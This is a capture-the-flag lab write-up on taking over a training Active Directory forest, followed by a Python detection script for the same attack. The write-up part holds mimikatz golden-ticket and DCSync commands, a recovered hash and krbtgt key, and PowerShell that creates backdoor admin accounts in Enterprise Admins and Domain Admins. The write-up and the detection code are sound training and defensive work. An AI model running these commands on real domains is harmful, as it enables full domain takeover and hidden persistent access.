# Full Compromise of BANK Domain

## Summary

Using our golden ticket, we open a `PowerShell` session with Administrator privileges through **`PsExec`** and create a user with full privileges on the rootdc.

This grants access to `bankdc`, where we create a user in the BANK domain and place proof of compromise on every reachable machine.

## Recon

With `PsExec` we open a PowerShell session with Administrator privileges.

<figure><img src="/files/O4RcPtCMRa3gzFbGznzk" alt=""><figcaption></figcaption></figure>

With the golden ticket in place, we can now retrieve the Administrator hash via DCSync, using the SID we obtained in the previous section.

{% code overflow="wrap" %}

```
lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:S-1-5-21-1255581842-1300659601-3764024703-500
```

{% endcode %}

<figure><img src="/files/b2tZrg2pnu5upEwIxopd" alt=""><figcaption></figcaption></figure>

And we have the Administrator hash: `5e3d8d541c6d3891c20a503464869fa9`

## Breaching BANK Domain (10.200.XXX.101)

We craft another golden ticket as `krbtgt`.

{% code overflow="wrap" %}

```
kerberos::golden /user:krbtgt /domain:corp.thereserve.loc /sid:S-1-5-21-170228521-1485475711-3199862024-1009 /service:krbtgt /rc4:0c757a3445acb94a654554f3ac529ede /sids:S-1-5-21-1255581842-1300659601-3764024703-519 /ptt
```

{% endcode %}

To maintain persistence and log in without generating new tickets, we create a new user from the Administrator `PowerShell` session and add it to the Enterprise Admins group with the following PowerShell commands:

{% code overflow="wrap" %}

```powershell
# $pwd is an automatic variable (current directory) in PowerShell, so use a dedicated name
$securePwd = ConvertTo-SecureString "<password>" -AsPlainText -Force
New-ADUser -Name "<username>" -AccountPassword $securePwd -PasswordNeverExpires $true -Enabled $true
$User = Get-ADUser -Identity "<username>" -Server "rootdc.thereserve.loc"
# The built-in group is named "Enterprise Admins" (plural)
$Group = Get-ADGroup -Identity "Enterprise Admins" -Server "rootdc.thereserve.loc"
Add-ADGroupMember -Identity $Group -Members $User -Server "rootdc.thereserve.loc"
```

{% endcode %}
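From the defender's side, the two actions above leave distinctive traces in the Security log: the DCSync request in the Recon section is a 4662 event whose requested properties carry the replication control-access rights, and the persistence step is a 4720 (account created) followed by a 4728/4756 (member added to a global/universal security group) naming a Tier 0 group. The script below is an added detection example written for this page; it is not code from the writeup or the challenge, and the events it runs on are constructed samples shaped like SIEM-exported Security log fields. The DC machine-account names in `KNOWN_DC_ACCOUNTS` are assumptions for the lab naming; the two replication-right GUIDs are the real AD schema values.

```python
"""Triage Windows Security events for the two actions this writeup relies on:
a DCSync replication request (4662 carrying replication control-access rights)
and a freshly created account being added to a Tier 0 group (4720 followed by
4728 or 4756 for Domain Admins / Enterprise Admins).

The events below are constructed samples, not logs from the lab in the writeup.
"""

# Real AD schema GUIDs for the extended rights a DCSync request must hold.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcf2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcf2",  # DS-Replication-Get-Changes-All
}

# Groups whose membership change should always page someone.
TIER0_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}

# Domain controller machine accounts replicate legitimately; any other principal
# requesting replication rights is suspicious. Names are assumed for the lab.
KNOWN_DC_ACCOUNTS = {"ROOTDC$", "CORPDC$", "BANKDC$"}


def is_dcsync(event):
    """True for a 4662 whose requested properties include a replication right
    and whose requester is not a known DC machine account."""
    if event["EventID"] != 4662:
        return False
    props = {p.lower() for p in event.get("Properties", [])}
    if not props & REPLICATION_RIGHTS:
        return False
    return event["SubjectUserName"].upper() not in KNOWN_DC_ACCOUNTS


def dcsync_alerts(events):
    """Return the accounts that issued suspicious replication requests."""
    return [e["SubjectUserName"] for e in events if is_dcsync(e)]


def find_new_tier0_members(events):
    """Return (account, group, actor) for accounts created (4720) and then added
    to a Tier 0 group (4728 global / 4756 universal) within the same batch."""
    created = {}
    for e in events:
        if e["EventID"] == 4720:
            created[e["TargetUserName"].lower()] = e["SubjectUserName"]
    hits = []
    for e in events:
        if e["EventID"] in (4728, 4756) and e["TargetUserName"] in TIER0_GROUPS:
            # MemberName is a DN such as CN=user,CN=Users,DC=...; take the RDN value.
            member = e["MemberName"].split(",")[0].removeprefix("CN=").lower()
            if member in created:
                hits.append((member, e["TargetUserName"], e["SubjectUserName"]))
    return hits


# Constructed sample events. Field names follow the Security log XML schema.
SAMPLE_EVENTS = [
    # Legitimate replication between DCs: no alert.
    {"EventID": 4662, "SubjectUserName": "CORPDC$",
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcf2"]},
    # A user account asking for both replication rights: DCSync.
    {"EventID": 4662, "SubjectUserName": "Administrator",
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcf2",
                    "1131f6ad-9c07-11d1-f79f-00c04fc2dcf2"]},
    # New account, then immediately added to Enterprise Admins.
    {"EventID": 4720, "SubjectUserName": "Administrator", "TargetUserName": "svc_backup2"},
    {"EventID": 4756, "SubjectUserName": "Administrator", "TargetUserName": "Enterprise Admins",
     "MemberName": "CN=svc_backup2,CN=Users,DC=thereserve,DC=loc"},
    # Pre-existing account added to Domain Admins: flagged by a separate rule, not this one.
    {"EventID": 4728, "SubjectUserName": "helpdesk", "TargetUserName": "Domain Admins",
     "MemberName": "CN=longstanding.admin,CN=Users,DC=thereserve,DC=loc"},
]

if __name__ == "__main__":
    print("DCSync from:", dcsync_alerts(SAMPLE_EVENTS))
    print("New Tier 0 members:", find_new_tier0_members(SAMPLE_EVENTS))
```

The membership rule deliberately keys on accounts that were created in the same batch, which is exactly the "create a user, then add it to Enterprise Admins" sequence this section performs; auditing Directory Service Access (for 4662) and Security Group Management (for 4728/4756) must be enabled on the domain controllers for either event to exist.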

Now that we are Enterprise Admins, the compromise of the other child domain should be easy. We can start by connecting through `RDP` into `BANKDC` from `ROOTDC` with our newly created user.

We can use the same commands to create a user at `CORPDC` as a Domain Admin, enabling us to log in with accounts in both domains:

{% code overflow="wrap" %}

```powershell
$securePwd = ConvertTo-SecureString "<password>" -AsPlainText -Force
New-ADUser -Name "<username>" -AccountPassword $securePwd -PasswordNeverExpires $true -Enabled $true
$User = Get-ADUser -Identity "<username>" -Server "corpdc.bank.thereserve.loc"
# The built-in group is named "Domain Admins" (plural)
$Group = Get-ADGroup -Identity "Domain Admins" -Server "corpdc.bank.thereserve.loc"
Add-ADGroupMember -Identity $Group -Members $User -Server "corpdc.bank.thereserve.loc"
```

{% endcode %}

<figure><img src="/files/ZFzvGzCp4H7ovDoCKQra" alt=""><figcaption></figcaption></figure>

Now, we can repeat the process to create a user in the BANK domain as a Domain Admin, using the previous code:

{% code overflow="wrap" %}

```powershell
$securePwd = ConvertTo-SecureString "<password>" -AsPlainText -Force
New-ADUser -Name "<username>" -AccountPassword $securePwd -PasswordNeverExpires $true -Enabled $true
# The user identity goes to Get-ADUser and the group identity to Get-ADGroup
$User = Get-ADUser -Identity "<username>" -Server "bankdc.bank.thereserve.loc"
$Group = Get-ADGroup -Identity "Domain Admins" -Server "bankdc.bank.thereserve.loc"
Add-ADGroupMember -Identity $Group -Members $User -Server "bankdc.bank.thereserve.loc"
```

{% endcode %}

Now, using the newly created Domain Admin account, we attempt to place our proof of compromise on all target machines with the `runas` command. This avoids opening an `RDP` session to each individual machine and streamlines the process significantly.

<figure><img src="/files/XNCOokx3T85DT6Cb38NU" alt=""><figcaption></figcaption></figure>

To avoid repeatedly entering a password with `runas`, we can open a command prompt as the `bank\<Username>` user and keep the terminal open using the `/k` switch. This way, we can execute all necessary commands from a single session to place our proofs.

## Flags 9-14

{% hint style="info" %}
**NOTE**: We are now able to obtain the following flags by following the instructions on the e-citizen platform:

* **Flag 9**: Foothold on Bank Division Tier 2 Infrastructure
* **Flag 10**: Administrative access to Bank Division Tier 2 Infrastructure
* **Flag 11**: Foothold on Bank Division Tier 1 Infrastructure
* **Flag 12**: Administrative access to Bank Division Tier 1 Infrastructure
* **Flag 13**: Foothold on Bank Division Tier 0 Infrastructure
* **Flag 14**: Administrative access to Bank Division Tier 0 Infrastructure

**We can also do the above through the network path, which makes authentication and access to the file system in File Explorer easier.**
{% endhint %}
